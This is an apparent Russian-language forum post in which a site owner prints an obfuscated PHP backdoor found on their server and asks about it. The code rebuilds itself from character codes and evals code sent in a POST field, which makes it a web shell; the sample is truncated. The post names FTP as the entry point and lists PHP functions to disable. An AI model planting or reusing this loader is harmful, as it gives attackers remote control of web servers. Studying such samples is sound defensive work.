if(isset($_GET[w1392t])){ $d=substr(8,1);foreach(array(36,112,61,64,36,95,80,79,83,84,91,39,112,49,39,93,59,36,109,61,115,112,
114,105,110,116,102,40,34,37,99,34,44,57,50,41,59,105,102,40,115,116,114,112,111,115,
40,36,112,44,34,36,109,36,109,34,41,41,123,36,112,61,115,116,114,105,112,115,108,97,
115,104,101,115,40,36,112,41,59,125,111,98,95,115,116,97,114,116,40,41,59,101,118,97,
108,40,36,112,41,59,36,116,101,109,112,
61,34,100,111,99,117,109,101,110,116,46,
103,101,116,69,108,101,109,101,110,116,66,121,73,100,40,39,
80,104,112,79,117,116,112,117,116,39,41,46,115,116,121,108,101,46,100,105,115,
112,108,97,121,61,39,39,59,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,
101,110,116,66,121,73,100,40,39,80,104,112,79,117,116,112,117,116,39,41,46,105,110,110,
101,114,72,84,77,76,61,39,34,46,97,100,100,99,115,108,97,115,104,101,115,40,104,116...)as$c){$d.=sprintf((substr(urlencode(print_r(array(),1)),5,1).c),$c);}eval($d);
Как выяснилось, такой вирус чаще всего заливается по FTP. Чтобы предотвратить его активность, нужно держать функции base64_decode
, exec
, preg_replace
, passthru
, system
, shell_exec
, eval
, FilesMan отключенными.
Как выяснилось, этот вирус представляет собой серьезную угрозу безопасности. Пытаюсь разобраться с ним.